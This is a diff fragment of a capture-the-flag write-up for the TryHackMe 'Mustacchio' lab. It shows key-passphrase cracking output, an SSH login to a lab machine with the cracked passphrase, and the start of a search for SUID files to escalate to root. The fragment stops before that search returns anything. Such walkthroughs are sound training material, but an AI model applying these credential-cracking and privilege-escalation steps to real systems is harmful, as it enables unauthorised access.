Defalt-cloud/CTF-Writeups/TryHackMe/Mustacchio/mustacchio.md

 1g 0:00:00:02 DONE (2021-06-13 09:19) 0.4566g/s 6548Kp/s 6548Kc/s 6548KC/sa6_123..*7¡Vamos!
 Session completed
 ```
 We got our passphrase.
-Let's ssh to our machine.
+Let's ssh to our user.

 ```bash
 ssh -i id_rsa barry@10.10.24.119
 Enter passphrase for key 'id_rsa': urieljames
 ```
 In **/home/barry** we can get our user flag.
 Let's get into the root.
+In the hints, They said about SUID lets find suid permission files.

+Use command :
+find / -perm -4000 2>/dev/null

 ```bash
 barry@mustacchio:~$ find / -perm -4000 2>/dev/null